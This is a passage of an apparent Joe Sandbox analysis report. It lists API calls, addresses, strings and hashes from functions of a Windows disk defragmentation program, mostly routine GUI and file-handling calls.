                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00430211
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                    • String ID: /e,/select,"%s%s"$explorer.exe$open
                                                                                                                                                                                                                                                                                    • API String ID: 206244367-2061274879
                                                                                                                                                                                                                                                                                    • Opcode ID: 91b799c5c29bacec4ab38221025e1244b966e820090f97b19e20c9fa35e543cc
                                                                                                                                                                                                                                                                                    • Instruction ID: 62bdf63df222c89057064cae7919c1e413492940edc838130925d2253cd5f780
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91b799c5c29bacec4ab38221025e1244b966e820090f97b19e20c9fa35e543cc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80C1E5312043008BC710EF24D995B9BB7E5BF88704F500A7EF9499B296DB74ED49CB9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0040FD1F
                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(?,0000005C,?), ref: 0040FD37
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040FD46
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040FDC3
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0040FE29
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0040FE38
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000120F,?,00000000), ref: 0040FE6C
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000120B,00000000,?), ref: 0040FE82
                                                                                                                                                                                                                                                                                    • RectVisible.GDI32(?,?), ref: 0040FEAC
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$ClientRect$CursorObjectScreenVisible
                                                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                                                    • API String ID: 883400287-2564639436
                                                                                                                                                                                                                                                                                    • Opcode ID: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                    • Instruction ID: e57791d17a927b35fa3e7b028ca1617c0da729b9688da5cd3a54cba97037c013
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e58942ff4a5daa3b07d53de4812bd48be39c791cdb0435b4f276cefe3218f9a6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB8119B11083819FD325DF65C984F9BB7E8FF88704F004A2DF58997291EB74A944CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0042DA84
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0042DAAE
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0042DAD4
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0042DAF2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0042DB00
                                                                                                                                                                                                                                                                                    • FillRect.USER32(?,?,?), ref: 0042DB38
                                                                                                                                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0042DBBE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ColorIndex, xrefs: 0042DA3E
                                                                                                                                                                                                                                                                                    • DiskDefrag\Setting Option\Gereral\DefragColor, xrefs: 0042DA43
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CompatibleCreateRect$BitmapClientFillMessageObjectSelectSend
                                                                                                                                                                                                                                                                                    • String ID: ColorIndex$DiskDefrag\Setting Option\Gereral\DefragColor
                                                                                                                                                                                                                                                                                    • API String ID: 24576784-1631410767
                                                                                                                                                                                                                                                                                    • Opcode ID: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                    • Instruction ID: 821a5ab27c6a8f9e6b02cc0ac72b1b3995420b0d805852c9f35119affff3cd9f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 413f7938cfa32640085c5d27a34cebb069bf0ab9b2ff2f1bc307b4aa97a93b27
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2617EB1608340AFC304DF68D884E5BB7E8FF88714F408A2EF59997291DB74E944CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00456B14
                                                                                                                                                                                                                                                                                      • Part of subcall function 00454290: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00454306
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 00456B57
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00456B7E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 00456BA5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000,00000000), ref: 00456BD6
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000001,00000000), ref: 00456C07
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000001,00000001), ref: 00456C38
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00456C5F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseHandle$CreateFileUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: \\.\C:
                                                                                                                                                                                                                                                                                    • API String ID: 1066634676-259948872
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • LoadMenuW.USER32(00000000), ref: 004228FF
                                                                                                                                                                                                                                                                                    • GetSubMenu.USER32(00000004,00000000), ref: 0042292A
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(113262B6), ref: 00422945
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$CursorLoad
                                                                                                                                                                                                                                                                                    • String ID: 3401032$3401033$3401086$3401087$3401088$[SSD]
                                                                                                                                                                                                                                                                                    • API String ID: 3043871728-3947735280
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0045382E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3341692771-0
                                                                                                                                                                                                                                                                                    • Opcode ID: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                    • Instruction ID: be2023aef89e17b54fd3cfd96c880170c5f98da2cba37ae09b4ebda1ed5f38f7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f91c71cdff771b475ab66cf7fa24957df628f7f2d51a469e190cf7c95d6e8a29
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79C1F4B56083448FC310DF69C884A5BFBE9BFC9714F148A5EE9888B361C775E905CB92
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32 ref: 0040F806
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001215,00000000,00000000), ref: 0040F82F
                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 0040F845
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 0040F876
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040F88B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F0C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00407E20: CopyRect.USER32(?,?), ref: 00407F1E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001209,00000000,00000000), ref: 0040F9EE
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageRectSend$Copy$Client
                                                                                                                                                                                                                                                                                    • String ID: $6
                                                                                                                                                                                                                                                                                    • API String ID: 201260696-4183747533
                                                                                                                                                                                                                                                                                    • Opcode ID: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                    • Instruction ID: 8b216fbeb9dde18344444fa578b156f2309188772abd6b45e307a88af5c25f20
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42de312bba28103fbd9c5fb933112db53f737e9031533f58468e5b08cd7e4db0
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4E141B15083429FD320DF25C580A9BFBE9FF88704F004A2EF49997381D778A949CB96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 005045EA
                                                                                                                                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 005046F8
                                                                                                                                                                                                                                                                                    • CatchIt.LIBVCRUNTIME ref: 00504749
                                                                                                                                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 0050484A
                                                                                                                                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00504865
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                    • API String ID: 4119006552-393685449
                                                                                                                                                                                                                                                                                    • Opcode ID: a65231c7224523d78c135119b38e93c421f23d8deef9d53e41ae7645979b48cb
                                                                                                                                                                                                                                                                                    • Instruction ID: 4c312c5944364cf67c01a2669073ec3c682224089c6a705f39cce00d7300e0bb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a65231c7224523d78c135119b38e93c421f23d8deef9d53e41ae7645979b48cb
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5B19DB180020AEFCF14DFA4C8859AEBFB5FF45310F14855AEA156B292D331DA61CF91
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CopyRect
                                                                                                                                                                                                                                                                                    • String ID: Bottom$Left$Margin$Right$Top$`=$=
                                                                                                                                                                                                                                                                                    • API String ID: 1989077687-1885521073
                                                                                                                                                                                                                                                                                    • Opcode ID: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                    • Instruction ID: 7cbf7df4fec77659c91c3afac7ac99305081f53a3d300e0ff47080e44fb4b669
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e266b93fc17dab845a5d8460d54d26b403d0d269895f540772a95358242b67c3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EB166766043419FC310DF28C881B5BB7E8FB98704F148A2EF58A97391DB75E944CB9A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102F,00000000,00000000), ref: 004187CD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004187EF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0041899B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 004189AF
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004189C5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,?), ref: 004189DB
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterSection
                                                                                                                                                                                                                                                                                    • String ID: %.2f%%$%I64u
                                                                                                                                                                                                                                                                                    • API String ID: 2245208738-2288124401
                                                                                                                                                                                                                                                                                    • Opcode ID: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                    • Instruction ID: e1e33ad56b98f5e84924c458d64c7c6c02eb77d82da0e984fc61a5a5d3d1ca0d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8a4837ba97be504fd883f7b81f214d570e02bb173e6daae76494a95ea94b1e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9EA16E71304201AFD368EB24CD85FAFB7B9AF88704F40491EF64697291DBB4AC45CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00418B07
                                                                                                                                                                                                                                                                                      • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,113262B6,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419480: SendMessageW.USER32(?,0000100C,000000FF,00000002), ref: 0041948D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000100C,?,00000002), ref: 00418BA8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000083FE,?,?), ref: 00418BF6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403D70: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00403D7D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000003), ref: 00418C9F
                                                                                                                                                                                                                                                                                      • Part of subcall function 00419460: SendMessageW.USER32(?,0000100C,?,00000002), ref: 00419470
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(?,open,explorer.exe,?,00000000,00000001), ref: 00418D51
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$CriticalEnterExecuteSectionShell
                                                                                                                                                                                                                                                                                    • String ID: /e,/select,"%s%s"$explorer.exe$open
                                                                                                                                                                                                                                                                                    • API String ID: 206244367-2061274879
                                                                                                                                                                                                                                                                                    • Opcode ID: f877a975dfb8fd7e3335437b9cdf50eff5a36e5d2e8446bffb34177b6d077c25
                                                                                                                                                                                                                                                                                    • Instruction ID: 9e016845d88e4024dd1218f79a327356caeee79904b42a6c0a28c628b7da3379
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f877a975dfb8fd7e3335437b9cdf50eff5a36e5d2e8446bffb34177b6d077c25
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2691E0712047009BD710EF24DD85FDAB7E5BF98704F00092EF945AB286DB78E945CBAA
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000133D,00000000,00000001), ref: 0042CE5B
                                                                                                                                                                                                                                                                                    • RedrawWindow.USER32(?,00000000,00000000,00000105,?,113262B6,?,?,?,?,?,?,?,?,?,004217B6), ref: 0042CEBD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001304,00000000,00000000), ref: 0042CEF4
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0042CF49
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$RedrawWindow
                                                                                                                                                                                                                                                                                    • String ID: %s (%c:)$%s (%s)$3401034$3401126
                                                                                                                                                                                                                                                                                    • API String ID: 648961319-3732436656
                                                                                                                                                                                                                                                                                    • Opcode ID: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                    • Instruction ID: fd74af85edc4f78d52bbe53b36b76dc0b3b7e67d0ab5ffb778a9a62391dde0ea
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e1afdf9b5f9a6a0a3f1bdb0e24b03c0913b1775ab901b2b3f138c93be5904649
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E718D716043409FD324DF64DD85FABBBF4EF88700F10492EFA5A96290DBB4A944CB5A
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll,NtQuerySystemInformation), ref: 00419B01
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00419B08
                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(00497F28), ref: 00419C49
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(00497F30), ref: 00419C54
                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00419C70
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00419C9C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: PerformanceQuery$Counter$AddressFrequencyHandleModuleProcUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID: NtQuerySystemInformation$ntdll
                                                                                                                                                                                                                                                                                    • API String ID: 3025674679-3593917365
                                                                                                                                                                                                                                                                                    • Opcode ID: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                    • Instruction ID: d06557f50192d5db3270ba6b6212bac26de826900838c4c68c4281c4e513f8d9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3125494ca8bbf67271106e3f1c2de1996966a1ae5acd7d052624fdc1ffea64cd
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF518F71B1C301ABD7149F11FD55AAA37E4FB98780F108C3EE585A2268FB3499418BDD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0042CAB6
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0042CAE7
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0042CB0D
                                                                                                                                                                                                                                                                                    • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB22
                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0042CB35
                                                                                                                                                                                                                                                                                    • GetParent.USER32(?), ref: 0042CB43
                                                                                                                                                                                                                                                                                    • SendNotifyMessageW.USER32(?,000083FF,00000000,00000000), ref: 0042CB58
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$NotifyParentVisibleWindow
                                                                                                                                                                                                                                                                                    • String ID: `=
                                                                                                                                                                                                                                                                                    • API String ID: 2910063261-2762138152
                                                                                                                                                                                                                                                                                    • Opcode ID: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                    • Instruction ID: cbd818397c052fadd252f380dd8efe1df66f27c17fa2dba641e1c387511c7e9b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a16c229816da6b7cf5f0a28e1e2d3aecd927b3af40c0253dbdebf6034a51f9bf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B0511030764700ABE224EF31DDD6FEA7394BB50B04F90842EB25F9A1D19FA47944CB99
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 004027B1
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,?), ref: 00402863
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                    • String ID: 3402041$3402042$DiskDefrag$Images$close$open
                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-3786962624
                                                                                                                                                                                                                                                                                    • Opcode ID: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                    • Instruction ID: 8150cbd10707325bb4a07bc8764e9056bc1ba0aa629cfab9f1adae748ae802a6
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdc453c516630b020ec0cec2833834f757ecf7b414e406f0a32de656b7e70e72
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8319EB579020027D61576254EA6FBE21661FC4B48F25C22FB30E7B3C2DEED9C41429E
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ActiveMessageWindow
                                                                                                                                                                                                                                                                                    • String ID: 3400001$3400101$3401090$rY
                                                                                                                                                                                                                                                                                    • API String ID: 3610105657-3605576623
                                                                                                                                                                                                                                                                                    • Opcode ID: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                    • Instruction ID: 7aa1b3021184ad304fb6d47c852e9f0d985907e1382866191d812cb31a89d144
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7d0b320c8ac4bba339029e9d88ce301a028bf10c8a73a5048825e82f1bb1e34
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 872179F0A50301BBD7106BB49C4AB9A31A8AF54701F50C82BB50EE1550D7BCA8449B6D
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00416BBB
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00416BCF
                                                                                                                                                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00416BDE
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000198,00000000,?), ref: 00416BFF
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00416C10
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000198,?,?), ref: 00416C74
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 00416C87
                                                                                                                                                                                                                                                                                    • PtInRect.USER32(?,?,?), ref: 00416C98
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?), ref: 00416CC7
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
